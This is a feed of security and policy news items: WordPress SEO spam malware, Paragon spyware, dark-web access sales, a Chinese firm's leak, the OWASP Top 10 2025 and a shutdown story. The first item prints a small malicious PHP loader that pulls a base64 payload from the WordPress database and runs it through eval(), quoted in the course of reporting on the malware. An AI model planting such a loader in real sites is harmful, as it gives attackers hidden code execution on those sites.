• Cybercriminals are increasingly targeting websites to inject malicious links and boost their search engine optimization rankings through sophisticated blackhat SEO tactics.

    This campaign primarily focuses on online casino spam, which has become the most prevalent type of spam content affecting compromised websites.

    Attackers exploit vulnerabilities in WordPress installations to insert spam content promoting online casinos, particularly those targeting international markets where gambling remains heavily regulated.

    The attackers employ multiple techniques to maintain persistence and evade detection. They hijack legitimate website pages by creating duplicate directories with identical names, effectively replacing original content with spam-filled landing pages.

    When visitors or search engines attempt to access pages, they are redirected to bogus directories containing links to undesirable casino websites.

    This technique exploits how Apache and Nginx web servers resolve filesystem paths before handing requests to WordPress rewrite engines.

    Sucuri security researchers identified a particularly sophisticated variant of this malware that incorporates multiple layers of redundancy.

    The malicious code is strategically planted in both theme and plugin files to ensure survival even if one component is discovered.

    Rather than creating easily detectable spam directories, this advanced version stores its payload within the WordPress database using deceptive option names.

    Multi-Layered Infection Mechanism

    The infection operates through clever database manipulation and dynamic content fetching.

    Researchers discovered malicious code embedded at the bottom of the theme’s functions.php file.

    Cloaked Content (Source - Sucuri)
    Cloaked Content (Source – Sucuri)

    The code retrieves a base64-encoded payload from the database using the option name wp_footers_logic and executes it through PHP’s eval() function:-

    $cloak = get_option('wp_footers_logic');
    if ($cloak) {
        $decoded = base64_decode($cloak);
        eval($decoded);
    }

    If eval() is disabled, the malware writes the payload to wp-content/cache/style.dat as a fallback mechanism. The decoded payload monitors incoming requests for specific URL paths, checking for cached spam content.

    When triggered, it fetches content from attacker-controlled domains like browsec[.]xyz. To ensure persistence, attackers plant reinfection code in additional plugin files. This code periodically searches for distinctive markers.

    If markers are missing, the code automatically reappends the malicious payload to both the theme’s functions.php file and the primary file of the first active plugin, demonstrating sophisticated SEO spam campaigns.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Threat Actors Actively Hacking Websites to Inject Malicious Links and Boost their SEO appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Francesco Nicodemo, a prominent political communications strategist and former Democratic Party communications director, has been identified as a new target in the expanding Paragon spyware surveillance campaign.

    The revelation marks a concerning escalation in the scope of sophisticated digital espionage operations targeting political figures in Italy.

    Nicodemo, who currently leads the communications agency Lievito, discovered the breach on January 31, 2025, when he received a suspicious WhatsApp message while traveling in Vienna.

    The agency has managed thirteen election campaigns throughout 2024, including successful center-left victories in Perugia, Liguria, and Umbria.

    The spyware infection remained active on Nicodemo’s Android device even after he switched to an iPhone, with the compromised phone sitting unused at his residence.

    Fanpage security researchers identified the attack pattern after cross-referencing similar incidents involving journalists and activists.

    The timing of the surveillance coincided with several high-profile regional elections, raising questions about potential espionage targeting opposition political strategies and communications.

    John Scott Railton from Citizen Lab, a cybersecurity watchdog organization, contacted Nicodemo multiple times through international calls before confirming the breach.

    The researcher emphasized the severity of the attack, noting that only a small number of Italian targets were selected for this particular espionage operation.

    The compromised device potentially exposed sensitive communications with Democratic Party parliamentarians, election candidates, and senior party officials.

    Infection Vector and Delivery Mechanism

    The Paragon Graphite spyware utilizes a sophisticated multi-stage infection process that begins with a deceptive WhatsApp message appearing to originate from legitimate WhatsApp Support infrastructure.

    Unlike traditional phishing attacks that require user interaction with malicious links, this spyware variant can establish persistence through zero-click exploitation techniques.

    The malware leverages vulnerabilities in messaging protocols to deploy surveillance modules capable of extracting messages, call logs, and location data from both active and inactive devices.

    Security experts note that the spyware maintains operational capability even when the target device is powered down, suggesting advanced firmware-level compromise techniques that bypass standard operating system security controls.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Italian Adviser Becomes Latest Target in Expanding Paragon Graphite Spyware Surveillance Case appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The construction industry has emerged as a lucrative target for advanced persistent threat groups and organized cybercriminal networks seeking unauthorized access to corporate systems.

    State-sponsored APT groups from China, Russia, Iran, and North Korea are increasingly focusing their operations on the building and construction sector, exploiting the industry’s rapid digital transformation and heavy reliance on third-party vendors.

    These threat actors are targeting construction companies to steal login credentials for Remote Desktop Protocol (RDP), Secure Shell (SSH), and Citrix systems, which serve as gateways to sensitive project data, financial records, and proprietary blueprints.

    The attacks exploit weak security practices and outdated legacy systems prevalent throughout the construction sector.

    Cybercriminals employ phishing emails, compromised credentials, and supply chain vulnerabilities to establish initial footholds within target networks.

    The sector’s widespread use of cloud-based project management tools and insufficient employee cybersecurity training create additional opportunities for exploitation.

    Once threat actors gain access, they leverage interconnected systems to move laterally across networks and exfiltrate valuable data including contracts, Building Information Modeling (BIM) files, and personal information of employees and clients.

    Rapid7 security researchers identified that many threat actors now purchase access to construction company networks through underground forums rather than conducting resource-intensive initial compromise operations themselves.

    These dark web marketplaces feature intermediaries and brokers who sell credentials to previously breached networks across all industries, with the construction sector representing a significant portion of available access.

    Access types traded include VPN, RDP, SSH, Citrix, SMTP, and FTP credentials, with pricing determined by the target organization’s size and network complexity.

    The evolving threat landscape underscores the urgent need for construction companies to implement comprehensive cybersecurity measures.

    The complex, collaborative nature of construction projects and the frequent exchange of sensitive documents amplify the risk, making the sector a prime target for corporate espionage, financial gain, and extortion through ransomware campaigns designed to disrupt project timelines.

    Dark Web Credential Marketplaces

    The underground economy for stolen construction industry credentials has flourished in recent months, with specialized forums facilitating the sale of network access to threat actors worldwide.

    Rapid7 researchers observed numerous listings advertising access to construction company networks, with prices varying based on the target’s revenue, geographic location, and the level of access provided.

    These marketplaces operate with sophisticated rating systems and escrow services, providing buyers with assurances about the validity of purchased credentials.

    Sellers often provide screenshots of active sessions or network diagrams to verify their access, creating a streamlined supply chain that lowers the barrier to entry for cybercriminal operations targeting the construction sector.

    VPN, RDP, Cpanel access to a construction company for sale on the dark web (Source - Rapid7)
    VPN, RDP, Cpanel access to a construction company for sale on the dark web (Source – Rapid7)

    This illustrates another example of VPN, RDP, and Cpanel access to construction companies being offered for sale, highlighting the variety of access types available to potential attackers.

    The availability of these credentials enables ransomware operators and data extortion groups to quickly scale their operations, bypassing traditional defense mechanisms and exploiting the trust inherent in legitimate remote access tools.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post APT Groups Attacking Construction Industry Networks to Steal RDP, SSH and Citrix Logins appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Senate on Sunday took a first step toward ending the longest-ever government shutdown, clearing a procedural hurdle to approve a package that would keep agencies funded through at least January and walk back thousands of federal employee layoffs. 

    The agreement came together on the shutdown’s 40th day and would approve full-year appropriations for the Veterans Affairs Department, Agriculture Department and the legislative branch. All other agencies would operate at their fiscal 2025 levels under a continuing resolution that would expire after Jan. 30. 

    Most Democrats still voted against the deal as it will not take any affirmative step to abate health care premium increases for millions of Americans next year, the key demand that led to the shutdown in the first place. Still, a sufficient number of Senate Democrats joined nearly all Republicans to approve the bill after stating the funding lapse was hurting too many people for it to continue. The upper chamber must still take additional votes to send the measure to the House, though the bill could wind up on President Trump’s desk later this week. 

    In one concession to Democrats, the bill will unwind the more than 4,000 layoffs the Trump administration issued during the shutdown. Those reductions in force are currently paused by a federal court.

    The court injunction applies to the duration of the shutdown and the Trump administration mostly had not indicated whether it would seek to move forward with the RIFs after the government reopens. In the interim, the employees remain on the rolls in a paid leave status. Some agencies, such as the Interior Department, have suggested the shutdown had no bearing on their layoffs plans.

    The legislation would ban all agencies from carrying out any RIFs through January. The package of three full-year funding bills would largely reject funding cuts proposed by President Trump, particularly those within USDA.  

    The measure will also ensure the Trump administration follows a 2019 law that guarantees back pay for all federal workers furloughed during the shutdown, something the White House had suggested it would not do. Those who worked during the shutdown are also guaranteed retroactive pay. 

    Sen. Tim Kaine, D-Va., said he voted for the bill in part to protect federal employees, though his state counterpart, Sen. Mark Warner, D-Va., voted against it. 

    “This legislation will protect federal workers from baseless firings, reinstate those who have been wrongfully terminated during the shutdown, and ensure federal workers receive back pay, as required by a law I got passed in 2019,” Kaine said. “That's a critical step that will help federal employees and all Americans who rely on government services.”

    Sen. Chris Van Hollen, D-Md., who also represents one of the largest shares of federal workers, voted against the measure despite pleading to continue fighting for civil servants. 

    “I am prepared to work toward a compromise, but this funding bill before us tonight does not come close to meeting those terms,” Van Hollen said, adding the measure failed to prevent the Trump administration from “ignoring the law and withholding funds for important priorities.” 

    Sen. John Thune, R-S.D., announced on Sunday that as part of the deal he will allow a vote in December on continuing Affordable Care Act subsidies. House Speaker Mike Johnson, R-La., has not made the same promise.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In early November 2025, Knownsec, one of China’s largest cybersecurity firms with direct government ties, experienced a catastrophic data breach that exposed over 12,000 classified documents.

    The incident revealed the scale and sophistication of state-sponsored cyber operations, including detailed information about cyber weapons, internal hacking tools, and a comprehensive global surveillance target list.

    This breach marks a significant turning point in understanding the technical capabilities and geopolitical scope of organized state-level cyber espionage operations.

    The compromised files contained far more than routine business data. Hackers successfully extracted technical documentation detailing collaborations between Knownsec and various Chinese government departments, complete source code for proprietary internal tools, and spreadsheets listing 80 overseas targets that were allegedly already compromised.

    The leaked materials initially surfaced on GitHub before rapid removal, though copies had already circulated extensively within the cybersecurity research community.

    Founded in 2007 and backed by Tencent in 2015, Knownsec operated over 900 employees across multiple Chinese offices, positioning the company as a critical node in China’s cyber infrastructure.

    Mrxn security analysts identified that the leaked documents reveal a comprehensive arsenal of offensive cyber capabilities.

    The company maintained sophisticated libraries of Remote Access Trojans capable of compromising Windows, Linux, macOS, iOS, and Android systems.

    Un-Mail Email Evidence Collection Platform (Source – Mrxn)

    Particularly concerning were Android-specific tools designed to extract message histories from Chinese chat applications and Telegram, enabling widespread communications interception.

    The most revealing aspect of this breach concerns the geographic scope and data volume of compromised targets.

    International locations named in the leaked spreadsheets include Japan, Vietnam, India, Indonesia, Nigeria, and the United Kingdom.

    Data Breach

    The documents detailed stolen data sets of staggering proportions: 95 gigabytes of immigration records from India, 3 terabytes of call records from South Korean telecommunications company LG U Plus, and 459 gigabytes of road planning data from Taiwan.

    These figures demonstrate systematic long-term access to critical infrastructure and sensitive government information across multiple nations.

    Beyond software tools, the leaked documents revealed hardware-based attack mechanisms, including a specially designed malicious power bank capable of covertly uploading data from connected victims’ devices.

    This technical sophistication indicates resourced, sustained operations targeting high-value intelligence collection.

    The Chinese government subsequently denied knowledge of the breach, with Foreign Ministry spokesperson Mao Ning claiming unfamiliarity with the incident while reiterating official opposition to cyberattacks.

    However, this response notably avoided denying state support for cybersecurity firms conducting intelligence activities, suggesting such operations are viewed as legitimate national security functions.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Chinese Cybersecurity Firm Data Breach Exposes State-Sponsored Hackers Cyber Weapons and Target List appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SecDef Hegseth’s message to defense-industry executives: Move faster and invest more, or we just might make you. President Trump’s Pentagon chief spoke for more than an hour to a packed auditorium at the National War College on Friday, a gathering Hegseth himself described as an opportunity to look those very executives “in the eye.”

    Chief takeaways: Hegseth unveiled a slew of policy changes intended to replace his department’s Cold War-era acquisition processes with ones that value speed over rigid requirements. But perhaps most notably, he told defense companies to put more of their own money into developing military technology, or take their business elsewhere, Defense One’s Lauren C. Williams reported from Fort McNair in southwest Washington, D.C. 

    SecDef: “We commit to doing our part, but industry also needs to be willing to invest their own dollars to meet the long-term demand signals provided to them. Industry must use capital expenditures to upgrade facilities, upskill their workforce, and expand capacity. If they don't, we are prepared to fully employ and leverage the many authorities provided to the president which ensure that the department can secure from industry anything and everything that is required to fight and win our nation's wars,” Hegseth said, and vowed to his audience, “We're going to make defense contracting competitive again.”

    The speech drew largely from a draft memo about the changes that circulated last week. More about that, here.

    Expert reax: “Their first response is going to be hiring a whole ton of K Street people to lobby Congress to point out the problems with this process, which is, we're going to take a lot more risk and a lot more things will fail,” said Steve Blank, a professor and co-founder of Stanford University's Gordian Knot Center for National Security Innovation. 

    Professor Blank called the speech a death knell for the Pentagon’s existing acquisition system. “The Department of War just shot the accountants and opted for speed,” he said, and added that he expects major defense contractors to push back against the new efforts. 

    However, the speech seemed well received among defense tech founders, executives, and investors, Williams reports. “It is a vindication of our thesis that America needs an acquisition system focused on meritocracy and transparency,” one attendee said. Read more, here

    Related reading: Sen. Elizabeth Warren “challenges [the] defense industry on right-to-repair opposition as funding talks continue,” Reuters reported Monday. 

    And more broadly across the Defense Department,Hegseth Is Purging Military Leaders With Little Explanation,” three New York Times correspondents reported Friday. That includes about two dozen generals and admirals in just nine months. “The utter unpredictability of Mr. Hegseth’s moves, as described in interviews with 20 current and former military officials, has created an atmosphere of anxiety and mistrust that has forced senior officers to take sides and, at times, pitted them against one another,” the reporters write. 

    Coverage continues below…


    Welcome to this Monday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. The Associated Press reports that on this day in 1898, an estimated “2,000 white supremacists killed dozens of African Americans, burned Black-owned businesses and forced the mayor, police chief and aldermen to resign at gunpoint, before installing their own mayor and city council in what became known as the ‘Wilmington Coup.’”

    Army Secretary Daniel Driscoll wants the service to buy one million small drones over a two- to three-year period, Reuters reported Friday, calling the development a “major ramp-up” for the Army’s acquisition plans. 

    Notable: The Army “acquires only about 50,000 drones annually today,” which helps indicate the scale of Driscoll’s challenge. For some added perspective, “Ukraine and Russia each produce roughly 4 million drones a year,” Reuters writes. 

    Driscoll: “We expect to purchase at least a million drones within the next two to three years. And we expect that at the end of one or two years from today, we will know that in a moment of conflict, we will be able to activate a supply chain that is robust enough and deep enough” to expand based on the threat.

    ICYMI: The Army launched a drone-centric pilot program called “SkyFoundry,” which is intended to accelerate work with private industry. “This concept will stimulate the U.S. drone industry, support American manufacturing, increase access to rare earth materials, produce low-cost components and ultimately deliver drones for immediate needs to the Army,” a service spokesman told Military Times, reporting Friday as well.

    “Some drones will be expendable as if they’re munitions, others will be durable, but not meant to last forever,” the spokesman said. Read more, here

    Analysis: As drones proliferate across the Army, Defense One’s Tom Novelly asks, will a new approach to flight school help the service’s pilots transition? 

    Background: The Army has said it will will cut 6,500 of its 30,000 active-duty aviation-community soldiers over the next two years, mostly by removing one aerial cavalry squadron from each active-duty combat aviation brigade, as part of the effort to build “a leaner, more lethal force.” 

    The rub: Current Army aviators are trying their best to stay optimistic, but fear that decades-worth of experience will be lost in the culling. But the Army doesn’t just want fewer pilots, it wants better-qualified ones; and it's looking to the defense industry for a solution. 

    That includes turning its longtime entry-level helicopter education into a new contractor-owned and -operated model called Flight School Next. Officials and contractors said the new model will offer a simplified approach to training, develop better aviator skills, and save money by taking helicopters, instructors, and maintenance out of the service’s hands. Continue reading, here

    Related reading:UK sends defence equipment to help Belgium deal with disruptive drones,” Reuters reported Sunday from London. 

    In the Pacific region, the U.S. Army is amid a rapid modernization effort called Transformation in Contact, and several of the units created or chosen to test new technology and concepts are part of U.S. Army Pacific, Defense One’s Jennifer Hlad reported Friday from the AFCEA TechNet Indo-Pacific conference in Honolulu.

    According to USARPAC’s commander, the greatest risk the Army has in the Indo-Pacific region is “being late” when a crisis or conflict emerges, out of position, not fast enough, “or even worse, doing nothing at all,” Gen. Ronald Clark told the conference audience. “So as leaders, we have to become comfortable with failing fast, iterating quickly, and developing better solutions,” he said. Read the rest, here

    And in new podcasts, a former senior director at the National Security Council joined us to discuss what the new film “A House of Dynamite” got right and wrong on U.S. missile defense and nuclear command and control. Jon Wolfsthal, director of Global Risk at the Federation of American Scientists, shared some of his experiences as special assistant to President Obama, where he was responsible for things like nuclear arms control and policy at the NSC. Find that conversation on our website, on Spotify, or wherever you get your podcasts. 

    And ICYMI ahead of Veterans Day, we recently spoke with historian David Nasaw who just published a new history of American World War II veterans and their often tortured journeys back to normalcy in his book, “The Wounded Generation.” You can find that conversation on our website as well, here

    Trump 2.0

    Developing: The Senate on Sunday took a first step toward ending the longest-ever government shutdown, clearing a procedural hurdle to approve a package that would keep agencies funded through at least January and walk back thousands of federal employee layoffs.

    The agreement would approve full-year appropriations for the Veterans Affairs Department, Agriculture Department and the legislative branch. All other agencies would operate at their fiscal 2025 levels under a continuing resolution that would expire after Jan. 30, Eric Katz of Government Executive reports.

    Next: The Senate must still take additional votes to send the measure to the House, though the bill could wind up on President Trump’s desk later this week. Read more, here.  

    Happening today: A federal judge is set to hear a legal challenge to West Virginia National Guard troops’ deployment to Washington, D.C., in August. That deployment came in response to the president’s orders when he offered false and exaggerated crime statistics to justify soldiers on the streets amid his takeover of the D.C. police force.

    Quick summary of the case: “A civic organization called the West Virginia Citizen Action Group says in a lawsuit that Gov. Patrick Morrisey exceeded his authority by deploying up to 300 Guard members to Washington, D.C.,” AP reports. “Under state law, the group argues, the governor may deploy the National Guard out of state only for certain purposes, such as responding to a natural disaster or another state’s emergency request.” For his part, “Morrisey’s office has argued the deployment was authorized under federal law.” 

    Related:In an encrypted group chat, National Guard members question Trump deployments,” NPR reported Monday. 

    And lastly: A federal judge is stepping down after warning this Trump administration poses an “existential threat to democracy” because, in part, he warns the president is “using the law for partisan purposes, targeting his adversaries while sparing his friends and donors from investigation, prosecution, and possible punishment,” District Court Judge Mark Wolf wrote in an op-ed published Sunday at The Atlantic.

    Why speak out? “I hope to be a spokesperson for embattled judges who, consistent with the code of conduct, feel they cannot speak candidly to the American people,” he told the New York Times this weekend.

    “The White House’s assault on the rule of law is so deeply disturbing to me that I feel compelled to speak out,” Wolf wrote in his essay, stressing for his readers, “Silence, for me, is now intolerable.” He added in a warning to Times readers, “Americans proudly say that we live in the longest-lived democracy in the world. But that should teach us that all the others failed.” Read more in his essay (gift link), here.

    Additional reading: 

    Reminder: Tomorrow is Veterans Day, and we tip our hat to those who served. So enjoy the federal holiday for those marking the occasion. And we’ll see you again on Wednesday!

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Menlo Park, CA, USA, November 10th, 2025, CyberNewsWire AccuKnox, a leader in Zero Trust Cloud-Native Application Protection Platforms (CNAPP), announced a strategic partnership with Incident Response Team SA DE CV (ShieldForce) and DeepRoot Technologies, a global cybersecurity service provider and managed services partner, to accelerate Zero Trust adoption and AI Security innovation across Mexico and parts […]

    The post Incident Response Team (ShieldForce) Partners with AccuKnox for Zero Trust CNAPP in Latin America appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Open Web Application Security Project (OWASP) has unveiled the 2025 edition of its flagship OWASP Top 10 2025, marking the eighth installment and introducing significant updates to address evolving software security threats.

    Released on November 6, 2025, this revised version incorporates community survey input and expanded data analysis, highlighting two new categories while consolidating others to reflect root causes rather than symptoms better.

    The list remains a critical resource for developers, security professionals, and organizations aiming to prioritize web application risks.​

    OWASP Top 10 2025 Key Changes

    The 2025 Top 10 features two fresh entries: A03:2025 – Software Supply Chain Failures and A10:2025 – Mishandling of Exceptional Conditions.

    The former expands on the 2021’s Vulnerable and Outdated Components, encompassing broader ecosystem risks like dependencies, build systems, and distribution infrastructure.

    This category, which includes five Common Weakness Enumerations (CWEs), topped community concerns despite limited testing data, underscoring its high exploit and impact potential from CVEs.​

    A10:2025 introduces 24 CWEs focused on improper error handling, logical flaws, and insecure failure states, such as failing open during abnormal conditions.

    Previously scattered under “poor code quality,” this category addresses how mishandled exceptions can expose sensitive data or enable denial-of-service attacks.

    Meanwhile, A01:2021 – Server-Side Request Forgery (SSRF) has been merged into A01:2025 – Broken Access Control, which retains its top spot with 40 CWEs affecting 3.73% of tested applications on average.​

    Other shifts include A02:2025 – Security Misconfiguration rising to second place (from fifth in 2021), impacting 3.00% of apps due to growing configuration complexities.

    A04:2025 – Cryptographic Failures dropped to fourth, while A05:2025 – Injection and A06:2025 – Insecure Design each fell two spots. Authentication Failures (A07) saw a name tweak for precision, and Logging & Alerting Failures (A09) emphasized actionable alerts over mere monitoring.​

    RankCategory CodeNameSummaryChange from 2021
    1A01:2025Broken Access ControlFlaws allowing attackers to bypass authorization or gain unauthorized access to data or functions. Includes 40 CWEs, affecting 3.73% of tested applications on average.Maintains #1; SSRF (A10:2021) consolidated into this category.
    2A02:2025Security MisconfigurationWeak default settings, exposed services, or inconsistent security controls across environments. Impacts 3.00% of applications.Moved up from #5 due to increased configuration complexity.
    3A03:2025Software Supply Chain FailuresVulnerabilities in dependencies, CI/CD systems, build processes, and distribution infrastructure. Covers 5 CWEs with high exploit scores.New; expands A06:2021 Vulnerable and Outdated Components.
    4A04:2025Cryptographic FailuresInsecure or outdated encryption practices leading to sensitive data exposure or system compromise. Includes 32 CWEs, affecting 3.80% of apps.Dropped from #2.
    5A05:2025InjectionInput validation flaws like SQL, OS command, or XSS injections. Associated with 38 CWEs and numerous CVEs.Dropped from #3.
    6A06:2025Insecure DesignRisks from poor architectural decisions or inadequate threat modeling during design.Dropped from #4; shows industry improvements in secure design.
    7A07:2025Authentication FailuresIssues in login, password policies, or session handling enabling unauthorized access. Covers 36 CWEs.Maintains #7; renamed from Identification and Authentication Failures.
    8A08:2025Software or Data Integrity FailuresFailures to verify integrity of software, code, or data, allowing tampering. Focuses on lower-level trust boundaries.Maintains #8; minor focus on integrity verification.
    9A09:2025Logging & Alerting FailuresGaps in monitoring, logging, or alerting that let attacks go undetected.Maintains #9; renamed to emphasize alerting over just logging.
    10A10:2025Mishandling of Exceptional ConditionsImproper error handling, logical flaws, or insecure failure states exposing data or causing DoS. Includes 24 CWEs.New category; previously under poor code quality.
    OWASP Top 10 2025 (Table: Cybersecuritynews.com)

    A visual mapping diagram illustrates these evolutions, showing arrows from 2021 categories like SSRF and Vulnerable Components to their 2025 counterparts, with new additions branching out.

    OWASP Top 10 2025 Classification Methodology

    OWASP’s approach blends data from over 175,000 CVEs mapped to 643 CWEs, prioritizing prevalence over frequency, focusing on apps with at least one instance per CWE.

    This edition analyzed 589 CWEs across categories, averaging 25 each, capped at 40 for practicality, to aid language-specific training. Community surveys elevated the visibility of underrepresented risks, balancing historical data with frontline insights from practitioners.​

    Exploitability and impact scores drawn from CVSS v2, v3, and v4, revealing shifts like higher impact weighting in newer versions. The result: a forward-looking list emphasizing systemic vulnerabilities in modern, cloud-native environments.​

    This update signals a maturing field, with improvements in areas like threat modeling evident in Insecure Design’s slide.

    Challenges like access control issues, found in 9 out of 10 security tests, still require close attention. Organizations should include these in their DevSecOps processes, prioritizing supply chain checks and strong error handling.

    As OWASP welcomes feedback until November 20, 2025, the final version is expected to be further refined before its full adoption in 2026.

    This Top 10 list not only provides guidance for remediation but also promotes secure-by-design principles, helping organizations navigate an increasingly complex threat landscape.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post OWASP Top 10 2025 – Revised Version Released With Two New Categories appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Menlo Park, CA, USA, November 10th, 2025, CyberNewsWire

    AccuKnox, a leader in Zero Trust Cloud-Native Application Protection Platforms (CNAPP), announced a strategic partnership with Incident Response Team SA DE CV (ShieldForce) and DeepRoot Technologies, a global cybersecurity service provider and managed services partner, to accelerate Zero Trust adoption and AI Security innovation across Mexico and parts of Latin America. 

    Incident Response Team SA DE CV (ShieldForce) – Cyber Resilience Partnership 

    Incident Response Team SA DE CV (ShieldForce), founded by Francisco Villegas, in Mexico, delivers AI-driven managed cybersecurity solutions, including Incident response, Managed SOC, endpoint protection, disaster recovery, anti-ransomware protection, and regulatory compliance management.

    Operating across Mexico and Latin America, Incident Response Team SA DE CV (ShieldForce) helps organizations minimize downtime, mitigate cyber risks, and protect their reputations in an increasingly complex digital landscape.

    Recently, Incident Response Team SA DE CV (ShieldForce’s) CEO, Francisco Villegas, presented at one of Mexico’s largest cybersecurity conferences.

    They presented in Spanish on the importance of Zero Trust CNAPP strategies in modern enterprises. This topic received highly positive audience feedback, reinforcing ShieldForce’s growing leadership in the region.

    Leadership Testimonials

    “Nuestra misión en ShieldForce siempre ha sido ayudar a los clientes a mantenerse por delante de la evolución de las amenazas a través de la automatización, la concienciación y la inteligencia,” dijo Francisco Javier Villegas Landin, Fundador y CEO de ShieldForce.

    “This partnership demonstrates the power of collaboration in advancing Zero Trust adoption,” said Vineel Kurumella, Partner at DeepRoot Technologies

    “We’re thrilled to collaborate with ShieldForce and DeepRoot Technologies in bringing AccuKnox’s Zero Trust and AI Security capabilities to North and Latin America,” said Raj Panchapakesan, Global Head of Business Development and Partner Ecosystem at AccuKnox

    Securing ‘Code to Cognition’

    AccuKnox provides comprehensive multi-cloud and on-premise security. In parallel, AccuKnox AI Security provides comprehensive protection for the full lifecycle of AI/ML/LLM workloads encompassing data, models, applications, and infrastructure.

    About ShieldForce

    ShieldForce is a global cybersecurity provider delivering AI-powered managed services, including SOC operations, endpoint protection, threat detection, incident response, and compliance management.

    About DeepRoot Technologies

    DeepRoot Technologies (DeepRootTech) specializes in cybersecurity and data engineering solutions that enhance detection, response, and data insight.

    The company designs secure data pipelines and AI-driven analytics frameworks that enable enterprises to protect critical systems without disrupting innovation.

    About AccuKnox

    AccuKnox is a Zero Trust CNAPP platform that delivers runtime protection, agentless risk assessment, and comprehensive visibility across cloud, container, and AI workloads.

    The company is a core contributor to leading CNCF open-source projects KubeArmor and ModelArmor. 

    Contact

    PMM

    Syed Hadi

    AccuKnox

    syed.hadi@accuknox.com

    The post Incident Response Team (ShieldForce) Partners with AccuKnox for Zero Trust CNAPP in Latin America appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated new cyberattack targeting Android devices in South Korea has been uncovered, leveraging Google’s asset-tracking feature, Find Hub, to remotely wipe sensitive user data. Threat actors disguised as psychological counselors and North Korean human rights activists have distributed malware masquerading as stress-relief programs, marking a significant escalation in state-sponsored attacks linked to the notorious […]

    The post Android Users Hit by Malware Disguised as Relaxation Programs appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶